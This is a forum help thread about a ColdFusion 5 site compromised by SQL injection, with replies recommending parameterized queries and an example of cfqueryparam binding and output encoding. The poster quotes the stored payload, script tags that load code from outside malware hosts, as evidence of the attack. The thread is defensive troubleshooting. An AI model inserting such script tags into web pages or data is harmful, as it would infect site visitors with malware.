We have a ColdFusion site that has been attacked. It is on a Windows 2000 server running ColdFusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:

Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.

I cannot locate any tools that will run on the server and Malwarebytes did not find anything. Any assistance would be greatly appreciated.

I just found where the malicious code was placed in our table and removed it, but how do I prevent it from returning? Here is what had been entered into one of the columns on multiple records.
              </title><script src=http://hgbyju.com/r.php ></script>                 </title><script src=http://nmmkmm.com/r.php ></script>
Big Monty, Senior Web Developer / CEO of ExchangeTree.org, Commented:
That should take care of it, unless you have other open avenues to your data.
Big Monty, Senior Web Developer / CEO of ExchangeTree.org, Commented:
To prevent the code from coming back, you're going to need to alter your code to either sanitize your data inputs or use prepared SQL queries:


It'll take some time but will ultimately save you these types of headaches when they occur.
jdines, Author, Commented:
My page is actually a ColdFusion page so I searched how to prevent SQL injection in ColdFusion and came up with this:


I have actually already updated the queries so will this take care of future problems? Thanks.
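
An unparameterized cfquery beside the same query bound with cfqueryparam, plus output encoding for the kind of value found in the table. This is an added example, not code from the thread; the datasource, table, column and parameter names are hypothetical.

```cfm
<!--- Added example. Hypothetical names: datasource "siteDSN", table "pages",
      columns "page_id" / "page_title", parameters url.id, form.id, form.title. --->

<!--- BEFORE: the URL value is pasted into the SQL text, so the database
      treats whatever arrives in ?id= as part of the statement. --->
<cfquery name="getPage" datasource="siteDSN">
    SELECT page_title
    FROM   pages
    WHERE  page_id = #url.id#
</cfquery>

<!--- AFTER: reject missing or non-numeric input up front, then bind the value.
      cfqueryparam passes it as a typed parameter, never as SQL text. --->
<cfparam name="url.id" type="numeric">
<cfquery name="getPage" datasource="siteDSN">
    SELECT page_title
    FROM   pages
    WHERE  page_id = <cfqueryparam value="#url.id#" cfsqltype="CF_SQL_INTEGER">
</cfquery>

<!--- String inputs get a type and a length limit as well. --->
<cfquery name="saveTitle" datasource="siteDSN">
    UPDATE pages
    SET    page_title = <cfqueryparam value="#form.title#"
                                      cfsqltype="CF_SQL_VARCHAR" maxlength="100">
    WHERE  page_id    = <cfqueryparam value="#form.id#" cfsqltype="CF_SQL_INTEGER">
</cfquery>

<!--- Encode on output so a stored value such as "</title><script ...>" is
      shown as text instead of closing the tag and loading a script. --->
<cfoutput query="getPage">
    <title>#HTMLEditFormat(page_title)#</title>
</cfoutput>
```

Every cfquery that takes form, URL or cookie values needs the same binding; a single query left in the BEFORE form is still an open avenue to the data.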
jdines, Author, Commented:
Thank you very much!
